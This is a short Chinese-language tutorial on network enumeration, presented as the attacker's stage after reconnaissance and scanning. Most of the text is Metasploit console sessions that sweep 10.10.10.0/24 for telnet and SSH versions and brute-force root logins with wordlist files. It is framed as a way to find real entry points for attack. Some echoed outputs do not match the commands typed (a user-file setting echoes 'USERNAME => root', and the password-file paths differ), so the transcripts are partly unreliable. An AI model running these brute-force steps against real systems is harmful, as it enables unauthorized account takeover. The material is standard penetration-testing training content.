网络查点-telnet、SSH网络查点

网络查点

继网络踩点、扫描之后一项网络情报信息搜集技术，网络查点针对已知的弱点，对识别出来的服务进行更加充分更具针对性的探查，来寻找真正可以攻击的入口，以及攻击过程中可能需要的关键数据。

与网络踩点、扫描的区别
与网络踩点技术的关键区别：攻击者的入侵程度。
与网络扫描技术的关键区别：攻击者的针对性与信息搜集的目标性。

网络查点能够搜集到的信息看起来好像是无害的，但这些信息被细心的高水平攻击者所掌握，就可能成为危害目标系统安全的祸根。例如
用户帐户名：口令猜测破解；
错误配置的共享资源：恶意程序上传；
老旧的网络服务版本：缓冲区溢出漏洞攻击。

telnet网络查点

服务查点

msf > use auxiliary/scanner/telnet/telnet_version
msf  auxiliary(telnet_version) > set RHOSTS 10.10.10.0/24
RHOSTS => 10.10.10.0/24
msf  auxiliary(telnet_version) > set THREADS 100
THREADS => 100
msf  auxiliary(telnet_version) > run

口令破解

msf > use auxiliary/scanner/telnet/telnet_login
msf  auxiliary(telnet_login) > set RHOSTS 10.10.10.254
RHOSTS => 10.10.10.254
msf  auxiliary(telnet_login) > set USER_File /root/Desktop/userlist
USERNAME => root
msf  auxiliary(telnet_login) > set USER_PASS_FILE /root/Desktop/passlist
PASS_FILE => /root/words.txt
msf  auxiliary(telnet_login) > set THREADS 50
THREADS => 50
msf  auxiliary(telnet_login) > show options
//查看配置
msf  auxiliary(telnet_login) > run

SSH网络查点

服务查点

msf > use auxiliary/scanner/ssh/ssh_version
msf  auxiliary(ssh_version) >
msf  auxiliary(ssh_version) > set RHOSTS 10.10.10.0/24
RHOSTS => 10.10.10.0/24
msf  auxiliary(ssh_version) > set THREADS 100
THREADS => 100
msf  auxiliary(ssh_version) > run

口令破解

msf > use auxiliary/scanner/ssh/ssh_login
msf  auxiliary(ssh_login) > set RHOSTS 10.10.10.254
RHOSTS => 10.10.10.254
msf  auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf  auxiliary(ssh_login) > set PASS_FILE /root/Desktop/words.txt
PASS_FILE => /root/words.txt
msf  auxiliary(ssh_login) > set THREADS 50
THREADS => 50
msf auxiliary(ssh_login) > set STOP_ON_SUCCESS true
//找到账号密码便停止，可选项
msf auxiliary(ssh_login) > unset STOP_ON_SUCCESS 
//unset命令用于删除这个选项的配置
msf  auxiliary(ssh_login) > run